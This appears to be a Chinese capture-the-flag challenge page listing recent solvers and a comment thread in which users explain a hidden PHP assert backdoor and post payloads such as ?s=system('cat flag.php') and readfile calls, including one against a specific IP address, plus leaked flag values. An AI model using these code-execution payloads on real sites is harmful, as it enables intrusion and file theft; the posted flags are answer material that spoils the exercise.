评分(10)
解题动态
rorer 攻破了该题 9小时前
Wzzzzzz 攻破了该题 16小时前
lzkang 攻破了该题 18小时前
billy856 攻破了该题 18小时前
moonSTRUCK 攻破了该题 1天前
青云07 攻破了该题 1天前
zwx1998 攻破了该题 1天前
rschei7 攻破了该题 1天前
seastaryao 攻破了该题 1天前
zttz1318 攻破了该题 1天前
WCjj 攻破了该题 2天前
18144280602 攻破了该题 2天前
mumu20260805 攻破了该题 2天前
CN19169645762 攻破了该题 2天前
z231288 攻破了该题 2天前
无言独望西楼月 攻破了该题 2天前
有梦想的咸鱼 攻破了该题 2天前
cxller 攻破了该题 3天前
BananKing 攻破了该题 3天前
评论
ggsea 9天前
举报
列出当前目录:?s=print_r(scandir('./')),看到flag.txt
lawrencekz 1月前
举报
flag{******}
hwx 1月前
举报
直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg
b2026tf 2月前
举报
本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');
syhaisy 2月前
举报
20702af5309ab1f70e0f7e8a81076a4e
hualong 2月前
举报
直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);
dlccom 2月前
举报
?s=readfile('/var/www/html/flaga15808abee46a1d5.txt'); 读出 flag
谢特恒123 3月前
举报
这个题可以看到是assert是代码执行漏洞它的作用跟eval一样,我们先调用system('ls');看网页中有什么文件,发现flag文件后,直接用system('cat 文件名');就可以了,评论区我只能说:还得是大佬用这么“高深”的解法
kitniu 3月前
举报
?s=system(dir),然后进入txt文件,flag{********}
攻防小哥 3月前
举报
flag{********}